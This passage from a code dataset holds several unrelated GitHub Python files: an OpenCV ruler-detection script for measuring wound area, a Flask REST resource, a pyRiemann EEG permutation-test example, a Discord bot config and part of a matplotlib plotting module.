1.5, blur_img, -0.5, 0)\n return usm\n\ndef cropImage(point,image,position_blue):\n crop_image = image.copy()\n \"\"\"Get width and height distances\"\"\"\n w = abs(point[0][2][0] - point[0][2][1])\n h = abs(point[0][2][1] - point[0][2][2])\n width_len = 0\n height_len = 0\n\n if w[0] != 0 and w[0] > w[1]:\n width_len = w[0]\n elif w[1] != 0:\n width_len = w[1]\n if h[0] != 0 and h[0] > h[1] :\n height_len = h[0]\n elif h[1] != 0:\n height_len = h[1]\n \n \n if position_blue == 'left': \n crop=crop_image[point[1][:2][0]-int(height_len/2):point[1][:2][0]+int(width_len/2),point[1][:2][1]+int(height_len/2):point[1][:2][1]+int(1.5*height_len)]\n \n elif position_blue == 'down': #find right block\n 
crop=crop_image[point[1][:2][0]-int(height_len/2):point[1][:2][0]+int(height_len/2),point[1][:2][1]+int(height_len/2):point[1][:2][1]+int(height_len)+int(height_len/2)]\n \n elif position_blue == 'right':\n crop=crop_image[point[1][:2][0]-int(height_len/2):point[1][:2][0]+int(width_len/2),point[1][:2][1]-int(1.5*height_len):point[1][:2][1]-int(height_len/2)]\n \n elif position_blue == 'upper':\n crop=crop_image[point[1][:2][0]-int(height_len/2):point[1][:2][0]+int(height_len/2),point[1][:2][1]-int(height_len)-int(height_len/2):point[1][:2][1]-int(height_len/2)]\n\n sharp_crop = sharpen(crop)\n return sharp_crop\n\ndef getEdgeline(crop_img):\n \"\"\"crop_img : crop image, laplacian binary, and threshold\"\"\"\n gray_crop = cv2.cvtColor(crop_img,cv2.COLOR_BGR2GRAY)\n blurred_crop = cv2.bilateralFilter(gray_crop,5,75,75)\n\n # convolute with proper kernels\n laplacian_crop = cv2.Laplacian(blurred_crop,cv2.CV_64F)\n\n th,binary = cv2.threshold(laplacian_crop,5,255,cv2.THRESH_BINARY)\n binary = np.uint8(binary)\n\n return binary\n\ndef findLines(binary,crop):\n base = cv2.HoughLinesP(binary, 1, np.pi / 180,18, minLineLength=10, maxLineGap=12)\n pixel_array = []\n show_img = crop.copy()\n\n if base is not None:\n for line in base:\n x1, y1, x2, y2 = line[0]\n cv2.line(show_img, (x1, y1), (x2, y2), (0, 0, 255), 1)\n pixel_length = np.abs(x2 - x1)\n pixel_array.append([(x1, y1), (x2, y2)])\n \n return pixel_array\n\ndef findVertialLine(crop,line_array):\n \"\"\"\n crop:crop image,vertical_array: line position\n return vertical_line: vertical line axis\n \"\"\"\n vertical_line = [] \n line_img = crop.copy()\n\n for i in range(len(line_array)):\n point1 = line_array[i][0]\n point2 = line_array[i][1]\n \n if point1[0] != point2[0]:\n slope = (point2[1] - point1[1]) / ( point1[0] - point2[0])\n else:\n slope = 0\n \n # Center point coordinates\n midpoint = (int((point1[0]+point2[0]) /2) ,int((point1[1]+point2[1]) /2))\n \n x1 = point1[0] -60 \n x2 = point1[0] +60\n \n y1 = int(slope * ( x1 - midpoint[0]) + midpoint[1] )\n y2 = int(slope * ( x2 - midpoint[0]) + midpoint[1] )\n \n vertical_line.append([slope,(x2,y2),(x1,y1),midpoint])\n cv2.line(line_img,(x2,y2),(x1,y1),(0,0,255),1)\n \n return vertical_line\n\ndef getFrequencyLine(vertical_array,crop):\n save_paraline = []\n for i in range(len(vertical_array)):\n s = vertical_array[i][0] # slope\n if s == 0 : #leaving a slope of 0\n save_paraline.append(vertical_array[i])\n\n line_save_posit = []\n temp = 255\n for line in range(len(save_paraline)):\n line_img2 = crop.copy()\n hsv_2 = crop.copy()\n hsv_2 = cv2.cvtColor(hsv_2,cv2.COLOR_BGR2HSV)\n h,s,v = cv2.split(hsv_2)\n #Sort the midpoint on the y-axis\n save_paraline.sort(key=lambda x:x[3][1])\n\n # Change negative image, find wave crest\n pixel_value = []\n test = crop.copy()\n gray = cv2.cvtColor(test,cv2.COLOR_BGR2GRAY)\n negative = 255-gray #negative image\n W = crop.shape[1]\n line_ = save_paraline[line][1][1]\n \n if line_ > 3 and W-line_ >4:\n for w in range(W):\n if s[line_][w] < 80:\n pixel_value.append(negative[line_][w])\n \n num_peak_3 = signal.find_peaks(pixel_value ,height=70, distance=2)\n print(num_peak_3[0])\n if len(num_peak_3[0]) < 3:\n print('not this line!!')\n continue\n elif len(num_peak_3[0]) >= 4:\n print('the number of peaks is ' + str(len(num_peak_3[0])))\n \n # Several crests represent several 0.1cm\n diffPixel = num_peak_3[0][-1] - num_peak_3[0][0]\n line_save_posit.append([line_,diffPixel,len(num_peak_3[0])-1,num_peak_3[0]])\n break\n return line_save_posit\n\ndef 
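In the ruler-detection record, `getFrequencyLine()` boils the ruler down to two numbers: the pixel span between the first and last tick peaks (`diffPixel`) and the number of 0.1 cm intervals between them, which `calculateArea()` later turns into a cm-per-pixel scale. A worked example with illustrative values:

```python
# Illustrative numbers: 5 detected tick peaks spanning 120 px on the ruler.
diff_pixel, n_peaks = 120, 5
cm_span = (n_peaks - 1) / 10                 # 4 intervals * 0.1 cm = 0.4 cm
cm2_per_pixel = (cm_span / diff_pixel) ** 2  # real area covered by one pixel
area = 30000 * cm2_per_pixel                 # e.g. a 30000-pixel wound mask
print(round(area, 3))                        # 0.333 (cm^2)
```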
calculatePix(objectMask,pixel):\n w,h = objectMask.shape[:2]\n num = 0 #pixel total number\n for i in range(w):\n for j in range(h):\n if objectMask[i][j] == pixel:\n num +=1\n return num\n\ndef getMaskBoundary(wound,msk_path): \n wound_image = wound.copy()\n gray2 = cv2.cvtColor(wound_image,cv2.COLOR_BGR2GRAY)\n \n objectPixel = calculatePix(gray2,255)\n return objectPixel\n \ndef calculateArea(line_array,objectPixel):\n \n ratio_pixel_cm = line_array[0][1]* line_array[0][1]\n real_area = round(int(line_array[0][2])/10 * int(line_array[0][2])/10,3)\n area = objectPixel * real_area / ratio_pixel_cm\n\n return area\n\nif __name__ == \"__main__\":\n \n img_path = 'image'\n msk_path = 'label'\n image =cv2.imread(img_path)\n image = cv2.resize(image,(600,600))\n wound = cv2.imread(msk_path,1)\n wound = cv2.resize(wound,(600,600))\n img_ = image.copy()\n crop = img_[390:440,310:360] #Find your own place \n \n binarzie = getEdgeline(crop) \n line_array = findLines(binarzie,crop)\n vertical_array = findVertialLine(crop,line_array)\n point_posit = getFrequencyLine(vertical_array,crop)\n objectPixel = getMaskBoundary(wound,msk_path)\n realArea = calculateArea(point_posit,objectPixel)\n \n print(\"Final area\",realArea)","repo_name":"luacy200820/Ruler-detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3760900041","text":"from datetime import datetime\r\nfrom flask_restful import Resource, reqparse, abort\r\nfrom models.questions import Question\r\nfrom flask_jwt_extended import jwt_required\r\nfrom app import db\r\n\r\nparser = reqparse.RequestParser()\r\nparser.add_argument('vote_id', type=int, required=True, help=\"vote_id обязательное поле\")\r\nparser.add_argument('content', type=str, required=True, help=\"content обязательное поле\")\r\nparser.add_argument('datevote', type=str, required=True, help=\"datevote обязательное поле\")\r\n\r\n\r\nclass QuestionResource(Resource):\r\n @jwt_required()\r\n def get(self, question_id):\r\n return Question.serialize(\r\n Question.query.filter_by(id=question_id).first_or_404(\r\n description='Question не найден'\r\n )\r\n )\r\n\r\n @jwt_required()\r\n def put(self, question_id):\r\n question = Question.query.filter_by(id=question_id).first_or_404(\r\n description='Question не найден'\r\n )\r\n args = parser.parse_args()\r\n\r\n question.vote_id = args['vote_id']\r\n question.datevote = datetime.strptime(args['datevote'], \"%Y-%m-%d\")\r\n question.content = args['content']\r\n db.session.commit()\r\n\r\n return {'msg': 'OK', 'data': question.serialize()}, 200\r\n\r\n @jwt_required()\r\n def delete(self, question_id):\r\n Question.query.filter_by(id=question_id).first_or_404(\r\n description='Question не найден'\r\n )\r\n\r\n Question.query.filter_by(id=question_id).delete()\r\n db.session.commit()\r\n return {'msg': 'Question удален'}, 200\r\n\r\n\r\nclass QuestionListResource(Resource):\r\n @jwt_required()\r\n def post(self):\r\n args = parser.parse_args()\r\n question = Question(vote_id=args['vote_id'], datevote=datetime.strptime(args['datevote'], \"%Y-%m-%d\"), content=args['content'])\r\n db.session.add(question)\r\n db.session.commit()\r\n return {'msg': 'OK', 'data': question.serialize()}, 201\r\n\r\n @jwt_required()\r\n def get(self):\r\n questions = Question.query.all()\r\n return [Question.serialize(item) for item in 
questions]","repo_name":"Octopus1773/flask-rest","sub_path":"resources/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19049813800","text":"\"\"\"\n====================================================================\nOne Way manova\n====================================================================\n\nOne way manova to compare Left vs Right.\n\"\"\"\nimport seaborn as sns\n\nfrom time import time\nfrom matplotlib import pyplot as plt\n\nfrom mne import Epochs, pick_types, events_from_annotations\nfrom mne.io import concatenate_raws\nfrom mne.io.edf import read_raw_edf\nfrom mne.datasets import eegbci\n\nfrom pyriemann.stats import PermutationDistance, PermutationModel\nfrom pyriemann.estimation import Covariances\nfrom pyriemann.spatialfilters import CSP\n\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.linear_model import LogisticRegression\n\nsns.set_style('whitegrid')\n###############################################################################\n# Set parameters and read data\n\n# avoid classification of evoked responses by using epochs that start 1s after\n# cue onset.\ntmin, tmax = 1., 3.\nevent_id = dict(hands=2, feet=3)\nsubject = 1\nruns = [6, 10, 14] # motor imagery: hands vs feet\n\nraw_files = [\n read_raw_edf(f, preload=True, verbose=False)\n for f in eegbci.load_data(subject, runs)\n]\nraw = concatenate_raws(raw_files)\n\n# Apply band-pass filter\nraw.filter(7., 35., method='iir')\n\nevents, _ = events_from_annotations(raw, event_id=dict(T1=2, T2=3))\n\npicks = pick_types(\n raw.info, meg=False, eeg=True, stim=False, eog=False, exclude='bads')\npicks = picks[::4]\n\n# Read epochs (train will be done only between 1 and 2s)\n# Testing will be done with a running classifier\nepochs = Epochs(\n raw,\n events,\n event_id,\n tmin,\n tmax,\n proj=True,\n picks=picks,\n baseline=None,\n preload=True,\n verbose=False)\nlabels = epochs.events[:, -1] - 2\n\n# get epochs\nepochs_data = epochs.get_data()\n\n# compute covariance matrices\ncovmats = Covariances().fit_transform(epochs_data)\n\nn_perms = 500\n###############################################################################\n# Pairwise distance based permutation test\n###############################################################################\n\nt_init = time()\np_test = PermutationDistance(n_perms, metric='riemann', mode='pairwise')\np, F = p_test.test(covmats, labels)\nduration = time() - t_init\n\nfig, axes = plt.subplots(1, 1, figsize=[6, 3], sharey=True)\np_test.plot(nbins=10, axes=axes)\nplt.title('Pairwise distance - %.2f sec.' % duration)\nprint('p-value: %.3f' % p)\nsns.despine()\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# t-test distance based permutation test\n###############################################################################\n\nt_init = time()\np_test = PermutationDistance(n_perms, metric='riemann', mode='ttest')\np, F = p_test.test(covmats, labels)\nduration = time() - t_init\n\nfig, axes = plt.subplots(1, 1, figsize=[6, 3], sharey=True)\np_test.plot(nbins=10, axes=axes)\nplt.title('t-test distance - %.2f sec.' 
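The pyRiemann script above reports `p` from label-permutation tests. As a sketch of the underlying idea, not pyRiemann's exact implementation: shuffle the labels many times, recompute the group statistic, and take the fraction of shuffles at least as extreme as the observed value:

```python
import numpy as np

rng = np.random.default_rng(42)
x = np.r_[rng.normal(0, 1, 30), rng.normal(0.8, 1, 30)]  # two shifted groups
labels = np.r_[np.zeros(30), np.ones(30)]

def stat(y):
    return abs(x[y == 0].mean() - x[y == 1].mean())

obs = stat(labels)
perms = [stat(rng.permutation(labels)) for _ in range(500)]
p = (1 + sum(s >= obs for s in perms)) / (1 + len(perms))  # add-one convention
print(round(p, 3))  # small p: the group difference is unlikely under chance
```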
% duration)\nprint('p-value: %.3f' % p)\nsns.despine()\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# F-test distance based permutation test\n###############################################################################\n\nt_init = time()\np_test = PermutationDistance(n_perms, metric='riemann', mode='ftest')\np, F = p_test.test(covmats, labels)\nduration = time() - t_init\n\nfig, axes = plt.subplots(1, 1, figsize=[6, 3], sharey=True)\np_test.plot(nbins=10, axes=axes)\nplt.title('F-test distance - %.2f sec.' % duration)\nprint('p-value: %.3f' % p)\nsns.despine()\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# Classification based permutation test\n###############################################################################\n\nclf = make_pipeline(CSP(4), LogisticRegression())\n\nt_init = time()\np_test = PermutationModel(n_perms, model=clf, cv=3, scoring='roc_auc')\np, F = p_test.test(covmats, labels)\nduration = time() - t_init\n\nfig, axes = plt.subplots(1, 1, figsize=[6, 3], sharey=True)\np_test.plot(nbins=10, axes=axes)\nplt.title('Classification - %.2f sec.' % duration)\nprint('p-value: %.3f' % p)\nsns.despine()\nplt.tight_layout()\nplt.show()\n","repo_name":"pyRiemann/pyRiemann","sub_path":"examples/stats/plot_oneWay_Manova.py","file_name":"plot_oneWay_Manova.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":535,"dataset":"github-code","pt":"19"} +{"seq_id":"33089803426","text":"# IDs for Hal to recognize.\nCRANEBOT_ID = 943551083467391006\nTOASTY_ID = 208946659361554432\n\nSECRET_GUILD = 567541770943070236\nHOME_GUILD = 944731867570143264\n\n# Help message\nHELP_MESSAGE = \"It seems you have asked about Crane's parody-auto-responder Discord bot. \" \\\n \"This is an application designed to simulate the ice-cold and magnetic conversational styling of \" \\\n \"Lil Hal Jr. The algorithms are guaranteed to be in ongoing development, and wonky from time to time. \" \\\n \"Use `^inquire` with any query, and Lil Hal Jr. will pull a statistical analysis straight out of his \" \\\n \"ass, just for you.\"\n\n# Each phrase is configured in lowercase, and mapped to its rudeness level, 1-5. 
Or 6...\n# Working on regex support...\nquiet_phrases = {\n \"quiet down\": 1,\n r\"\\bs+h+\\b\": 1,\n r\"\\bs*h+u+s+h+\": 1,\n \"be quiet\": 2,\n \"zip it\": 3,\n \"stop talking\": 3,\n \"put a sock in it\": 4,\n \"go away\": 4,\n \"shut up\": 5,\n \"fuck off\": 6,\n \"drop dead\": 6\n}\n\nreturn_phrases = [\n \"come back\",\n \"i didnt mean it\",\n \"i didnt mean that\",\n \"you can talk\"\n]\n\nQUIET_EMOJI = \"🤫\"\n","repo_name":"cryptiddddd/lilhaljr","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11973932894","text":"\"\"\"\nFunctions for plotting datasets nicely.\n\"\"\"\n# TODO: custom xtick labels #\n# TODO: annotations, arbitrary text #\n# TODO: docs #\n\nimport functools\nimport itertools\nimport collections\n\nimport numpy as np\n\nfrom ..manage import auto_xyz_ds\nfrom .core import (\n Plotter,\n AbstractLinePlot,\n AbstractScatter,\n AbstractHistogram,\n AbstractHeatMap,\n PLOTTER_DEFAULTS,\n calc_row_col_datasets,\n intercept_call_arg,\n prettify,\n)\nfrom .color import xyz_colormaps, cimple\n\n\n# ----------------- Main lineplot interface for matplotlib ------------------ #\n\nclass PlotterMatplotlib(Plotter):\n \"\"\"\n \"\"\"\n\n def __init__(self, ds, x, y, z=None, y_err=None, x_err=None, **kwargs):\n super().__init__(ds, x, y, z=z, y_err=y_err, x_err=x_err,\n **kwargs, backend='MATPLOTLIB')\n\n def prepare_axes(self):\n \"\"\"\n \"\"\"\n import matplotlib as mpl\n if self.math_serif:\n mpl.rcParams['mathtext.fontset'] = 'cm'\n mpl.rcParams['mathtext.rm'] = 'serif'\n mpl.rcParams['font.family'] = self.font\n mpl.rcParams['font.weight'] = self.font_weight\n import matplotlib.pyplot as plt\n\n if self.axes_rloc is not None:\n if self.axes_loc is not None:\n raise ValueError(\"Cannot specify absolute and relative \"\n \"location of axes at the same time.\")\n if self.add_to_fig is None:\n raise ValueError(\"Can only specify relative axes position \"\n \"when adding to a figure, i.e. 
when \"\n \"add_to_fig != None\")\n\n if self.axes_rloc is not None:\n self._axes_loc = self._cax_rel2abs_rect(\n self.axes_rloc, self.add_to_fig.get_axes()[-1])\n else:\n self._axes_loc = self.axes_loc\n\n # Add a new set of axes to an existing plot\n if self.add_to_fig is not None and self.subplot is None:\n self._fig = self.add_to_fig\n self._axes = self._fig.add_axes((0.4, 0.6, 0.30, 0.25)\n if self._axes_loc is None else\n self._axes_loc)\n\n # Add lines to an existing set of axes\n elif self.add_to_axes is not None:\n self._fig = self.add_to_axes\n self._axes = self._fig.get_axes()[-1]\n\n # Add lines to existing axes but only sharing the x-axis\n elif self.add_to_xaxes is not None:\n self._fig = self.add_to_xaxes\n self._axes = self._fig.get_axes()[-1].twinx()\n\n elif self.subplot is not None:\n # Add new axes as subplot to existing subplot\n if self.add_to_fig is not None:\n self._fig = self.add_to_fig\n\n # New figure but add as subplot\n else:\n self._fig = plt.figure(self.fignum, figsize=self.figsize,\n dpi=100)\n self._axes = self._fig.add_subplot(self.subplot)\n\n # Make new figure and axes\n else:\n self._fig = plt.figure(self.fignum, figsize=self.figsize, dpi=100)\n self._axes = self._fig.add_axes((0.15, 0.15, 0.8, 0.75)\n if self._axes_loc is None else\n self._axes_loc)\n self._axes.set_title(\"\" if self.title is None else self.title,\n fontsize=self.fontsize_title, pad=self.title_pad)\n\n def set_axes_labels(self):\n if self._xtitle:\n self._axes.set_xlabel(self._xtitle, fontsize=self.fontsize_xtitle)\n self._axes.xaxis.labelpad = self.xtitle_pad\n if self._ytitle:\n self._axes.set_ylabel(self._ytitle, fontsize=self.fontsize_ytitle)\n self._axes.yaxis.labelpad = self.ytitle_pad\n if self.ytitle_right:\n self._axes.yaxis.set_label_position(\"right\")\n\n def set_axes_scale(self):\n \"\"\"\n \"\"\"\n self._axes.set_xscale(\"log\" if self.xlog else \"linear\")\n self._axes.set_yscale(\"log\" if self.ylog else \"linear\")\n\n def set_axes_range(self):\n \"\"\"\n \"\"\"\n if self._xlims:\n self._axes.set_xlim(self._xlims)\n if self._ylims:\n self._axes.set_ylim(self._ylims)\n\n def set_spans(self):\n \"\"\"\n \"\"\"\n if self.vlines is not None:\n for x in self.vlines:\n self._axes.axvline(x, lw=self.span_width,\n color=self.span_color,\n linestyle=self.span_style)\n if self.hlines is not None:\n for y in self.hlines:\n self._axes.axhline(y, lw=self.span_width,\n color=self.span_color,\n linestyle=self.span_style)\n\n def set_gridlines(self):\n \"\"\"\n \"\"\"\n for axis in ('top', 'bottom', 'left', 'right'):\n self._axes.spines[axis].set_linewidth(1.0)\n\n if self.gridlines:\n # matplotlib has coarser gridine style than bokeh\n self._gridline_style = [x / 2 for x in self.gridline_style]\n self._axes.set_axisbelow(True) # ensures gridlines below all\n self._axes.grid(True, color=\"0.9\", which='major',\n linestyle=(0, self._gridline_style))\n self._axes.grid(True, color=\"0.95\", which='minor',\n linestyle=(0, self._gridline_style))\n\n def set_tick_marks(self):\n \"\"\"\n \"\"\"\n import matplotlib as mpl\n\n if self.xticks is not None:\n self._axes.set_xticks(self.xticks, minor=False)\n self._axes.get_xaxis().set_major_formatter(\n mpl.ticker.ScalarFormatter())\n if self.yticks is not None:\n self._axes.set_yticks(self.yticks, minor=False)\n self._axes.get_yaxis().set_major_formatter(\n mpl.ticker.ScalarFormatter())\n\n if self.xtick_labels is not None:\n self._axes.set_xticklabels(self.xtick_labels)\n\n if self.xticklabels_hide:\n (self._axes.get_xaxis()\n 
.set_major_formatter(mpl.ticker.NullFormatter()))\n if self.yticklabels_hide:\n (self._axes.get_yaxis()\n .set_major_formatter(mpl.ticker.NullFormatter()))\n\n self._axes.tick_params(labelsize=self.fontsize_ticks, direction='out',\n bottom='bottom' in self.ticks_where,\n top='top' in self.ticks_where,\n left='left' in self.ticks_where,\n right='right' in self.ticks_where)\n\n if self.yticklabels_right or (self.yticklabels_right is None and\n self.ytitle_right is True):\n self._axes.yaxis.tick_right()\n\n def _cax_rel2abs_rect(self, rel_rect, cax=None):\n \"\"\"Turn a relative axes specification into a absolute one.\n \"\"\"\n if cax is None:\n cax = self._axes\n bbox = cax.get_position()\n l, b, w, h = bbox.x0, bbox.y0, bbox.width, bbox.height\n cl = l + w * rel_rect[0]\n cb = b + h * rel_rect[1]\n try:\n cw = w * rel_rect[2]\n ch = h * rel_rect[3]\n except IndexError:\n return cl, cb\n return cl, cb, cw, ch\n\n def plot_legend(self, grid=False, labels_handles=None):\n \"\"\"Add a legend\n \"\"\"\n if self._use_legend:\n\n if labels_handles:\n labels, handles = zip(*labels_handles.items())\n else:\n handles, labels = self._legend_handles, self._legend_labels\n\n if self.legend_reverse:\n handles, labels = handles[::-1], labels[::-1]\n\n # Limit minimum size of markers that appear in legend\n should_auto_scale_legend_markers = (\n (self.legend_marker_scale is None) and # not already set\n hasattr(self, '_marker_size') and # is a valid parameter\n self._marker_size < 3 # and is small\n )\n if should_auto_scale_legend_markers:\n self.legend_marker_scale = 3 / self._marker_size\n\n opts = {\n 'title': (self.z_coo if self.ztitle is None else self.ztitle),\n 'loc': self.legend_loc,\n 'fontsize': self.fontsize_zlabels,\n 'frameon': self.legend_frame,\n 'framealpha': self.legend_frame_alpha,\n 'numpoints': 1,\n 'scatterpoints': 1,\n 'handlelength': self.legend_handlelength,\n 'markerscale': self.legend_marker_scale,\n 'labelspacing': self.legend_label_spacing,\n 'columnspacing': self.legend_column_spacing,\n 'bbox_to_anchor': self.legend_bbox,\n 'ncol': self.legend_ncol\n }\n\n if grid:\n bb = opts['bbox_to_anchor']\n if bb is None:\n opts['bbox_to_anchor'] = (1, 0.5, 0, 0)\n opts['loc'] = 'center left'\n else:\n loc = opts['loc']\n # will get warning for 'best'\n opts['loc'] = 'center' if loc in ('best', 0) else loc\n lgnd = self._fig.legend(handles, labels, **opts)\n else:\n lgnd = self._axes.legend(handles, labels, **opts)\n\n lgnd.get_title().set_fontsize(self.fontsize_ztitle)\n\n if self.legend_marker_alpha is not None:\n for legendline in lgnd.legendHandles:\n legendline.set_alpha(1.0)\n\n def set_mappable(self):\n \"\"\"Mappale object for colorbars.\n \"\"\"\n from matplotlib.cm import ScalarMappable\n self.mappable = ScalarMappable(cmap=self.cmap, norm=self._color_norm)\n self.mappable.set_array([])\n\n def plot_colorbar(self, grid=False):\n \"\"\"Add a colorbar to the data.\n \"\"\"\n\n if self._use_colorbar:\n # Whether the colorbar should clip at either end\n extendmin = (self.vmin is not None) and (self.vmin > self._zmin)\n extendmax = (self.vmax is not None) and (self.vmax < self._zmax)\n extend = ('both' if extendmin and extendmax else\n 'min' if extendmin else\n 'max' if extendmax else\n 'neither')\n\n opts = {'extend': extend, 'ticks': self.zticks}\n\n if self.colorbar_relative_position:\n opts['cax'] = self._fig.add_axes(\n self._cax_rel2abs_rect(self.colorbar_relative_position))\n\n if grid:\n opts['ax'] = self._fig.axes\n opts['anchor'] = (0.5, 0.5)\n\n self._cbar = 
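# Hedged standalone sketch of the `set_mappable` pattern above: an empty
# ScalarMappable carrying only a cmap and norm is enough to drive
# `Figure.colorbar`, even when no artist was drawn with that mapping.
import matplotlib.pyplot as plt
from matplotlib.cm import ScalarMappable
from matplotlib.colors import Normalize

_fig, _ax = plt.subplots()
_sm = ScalarMappable(cmap='inferno', norm=Normalize(vmin=0.0, vmax=1.0))
_sm.set_array([])
_fig.colorbar(_sm, ax=_ax)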
self._fig.colorbar(\n self.mappable, **opts, **self.colorbar_opts)\n\n self._cbar.ax.tick_params(labelsize=self.fontsize_zlabels)\n\n self._cbar.ax.set_title(\n self._ctitle, fontsize=self.fontsize_ztitle,\n color=self.colorbar_color if self.colorbar_color else None)\n\n if self.colorbar_color:\n self._cbar.ax.yaxis.set_tick_params(\n color=self.colorbar_color, labelcolor=self.colorbar_color)\n self._cbar.outline.set_edgecolor(self.colorbar_color)\n\n def set_panel_label(self):\n if self.panel_label is not None:\n self._axes.text(*self.panel_label_loc, self.panel_label,\n transform=self._axes.transAxes,\n fontsize=self.fontsize_panel_label,\n color=self.panel_label_color,\n ha='left', va='top')\n\n def show(self):\n import matplotlib.pyplot as plt\n if self.return_fig:\n plt.close(self._fig)\n return self._fig\n\n def prepare_plot(self):\n \"\"\"Do all the things that every plot has.\n \"\"\"\n self.prepare_axes()\n self.set_axes_labels()\n self.set_axes_scale()\n self.set_axes_range()\n self.set_spans()\n self.set_gridlines()\n self.set_tick_marks()\n\n# --------------------------------------------------------------------------- #\n\n\ndef mpl_multi_plot(fn):\n \"\"\"Decorate a plotting function to plot a grid of values.\n \"\"\"\n\n @functools.wraps(fn)\n def multi_plotter(ds, *args, row=None, col=None, hspace=None, wspace=None,\n tight_layout=True, coltitle=None, rowtitle=None,\n **kwargs):\n\n if (row is None) and (col is None):\n return fn(ds, *args, **kwargs)\n\n import matplotlib.pyplot as plt\n from matplotlib.gridspec import GridSpec\n\n # Set some global parameters\n p = fn(ds, *args, **kwargs, call=False)\n p.prepare_data_multi_grid()\n\n kwargs['vmin'] = kwargs.pop('vmin', p.vmin)\n kwargs['vmax'] = kwargs.pop('vmax', p.vmax)\n\n coltitle = col if coltitle is None else coltitle\n rowtitle = row if rowtitle is None else rowtitle\n\n # split the dataset into its respective rows and columns\n ds_r_c, nrows, ncols = calc_row_col_datasets(ds, row=row, col=col)\n\n figsize = kwargs.pop('figsize', (3 * ncols, 3 * nrows))\n return_fig = kwargs.pop('return_fig', PLOTTER_DEFAULTS['return_fig'])\n\n # generate a figure for all the plots to use\n p._fig = plt.figure(figsize=figsize, dpi=100,\n constrained_layout=tight_layout)\n p._fig.set_constrained_layout_pads(hspace=hspace, wspace=wspace)\n # and a gridspec to position them\n gs = GridSpec(nrows=nrows, ncols=ncols, figure=p._fig,\n hspace=hspace, wspace=wspace)\n\n # want to collect all entries for legend\n labels_handles = {}\n\n # range through rows and do subplots\n for i, ds_r in enumerate(ds_r_c):\n skws = {'legend': False, 'colorbar': False}\n\n # if not last row\n if i != nrows - 1:\n skws['xticklabels_hide'] = True\n skws['xtitle'] = ''\n\n # range through columns\n for j, sub_ds in enumerate(ds_r):\n\n if hspace == 0 and wspace == 0:\n ticks_where = []\n if j == 0:\n ticks_where.append('left')\n if i == 0:\n ticks_where.append('top')\n if j == ncols - 1:\n ticks_where.append('right')\n if i == nrows - 1:\n ticks_where.append('bottom')\n skws['ticks_where'] = ticks_where\n\n # if not first column\n if j != 0:\n skws['yticklabels_hide'] = True\n skws['ytitle'] = ''\n\n # label each column\n if (i == 0) and (col is not None):\n col_val = prettify(ds[col].values[j])\n skws['title'] = \"{} = {}\".format(coltitle, col_val)\n fx = 'fontsize_xtitle'\n skws['fontsize_title'] = kwargs.get(\n fx, PLOTTER_DEFAULTS[fx])\n\n # label each row\n if (j == ncols - 1) and (row is not None):\n # XXX: if number of cols==1 this hide yaxis - want 
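# Hedged standalone restatement of the `_cax_rel2abs_rect` arithmetic that
# the colorbar placement above relies on, as a pure function so it can be
# checked without a figure (names illustrative).
def rel2abs_rect(rel_rect, abs_rect):
    """Map a rect given relative to `abs_rect` into absolute figure coords."""
    l, b, w, h = abs_rect
    out = (l + w * rel_rect[0], b + h * rel_rect[1])
    if len(rel_rect) == 4:
        out += (w * rel_rect[2], h * rel_rect[3])
    return out

# e.g. the top-right quadrant of axes spanning (0.1, 0.1, 0.8, 0.8):
print(rel2abs_rect((0.5, 0.5, 0.5, 0.5), (0.1, 0.1, 0.8, 0.8)))
# -> (0.5, 0.5, 0.4, 0.4)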
both\n row_val = prettify(ds[row].values[i])\n skws['ytitle_right'] = True\n skws['ytitle'] = \"{} = {}\".format(rowtitle, row_val)\n\n sP = fn(sub_ds, *args, add_to_fig=p._fig, call='both',\n subplot=gs[i, j], **{**kwargs, **skws})\n\n try:\n labels_handles.update(dict(zip(sP._legend_labels,\n sP._legend_handles)))\n except AttributeError:\n pass\n\n # make sure all have the same plot ranges\n xmins, xmaxs = zip(*(gax.get_xlim() for gax in p._fig.axes))\n ymins, ymaxs = zip(*(gax.get_ylim() for gax in p._fig.axes))\n xmin, xmax = min(xmins), max(xmaxs)\n ymin, ymax = min(ymins), max(ymaxs)\n for gax in p._fig.axes:\n gax.set_xlim(xmin, xmax)\n gax.set_ylim(ymin, ymax)\n\n # add global legend or colorbar\n p.plot_legend(grid=True, labels_handles=labels_handles)\n p.plot_colorbar(grid=True)\n\n if return_fig:\n plt.close(p._fig)\n return p._fig\n\n return multi_plotter\n\n\n# --------------------------------------------------------------------------- #\n\nclass LinePlot(PlotterMatplotlib, AbstractLinePlot):\n \"\"\"\n \"\"\"\n\n def __init__(self, ds, x, y, z=None, *, y_err=None, x_err=None, **kwargs):\n super().__init__(ds, x, y, z=z, y_err=y_err, x_err=x_err, **kwargs)\n\n def plot_lines(self):\n \"\"\"\n \"\"\"\n for data in self._gen_xy():\n col = next(self._cols)\n\n line_opts = {\n 'c': col,\n 'lw': next(self._lws),\n 'marker': next(self._mrkrs),\n 'markersize': self._marker_size,\n 'markeredgecolor': col[:3] + (self.marker_alpha * col[3],),\n 'markerfacecolor': col[:3] + (self.marker_alpha * col[3] / 2,),\n 'label': next(self._zlbls),\n 'zorder': next(self._zordrs),\n 'linestyle': next(self._lines),\n 'rasterized': self.rasterize,\n }\n\n if ('ye' in data) or ('xe' in data):\n self._axes.errorbar(data['x'], data['y'],\n yerr=data.get('ye', None),\n xerr=data.get('xe', None),\n ecolor=col,\n capsize=self.errorbar_capsize,\n capthick=self.errorbar_capthick,\n elinewidth=self.errorbar_linewidth,\n **line_opts)\n else:\n # add line to axes, with options cycled through\n self._axes.plot(data['x'], data['y'], **line_opts)\n\n self._legend_handles, self._legend_labels = \\\n self._axes.get_legend_handles_labels()\n\n def __call__(self):\n self.prepare_data_single()\n # matplotlib preparation\n self.prepare_plot()\n self.plot_lines()\n self.plot_legend()\n 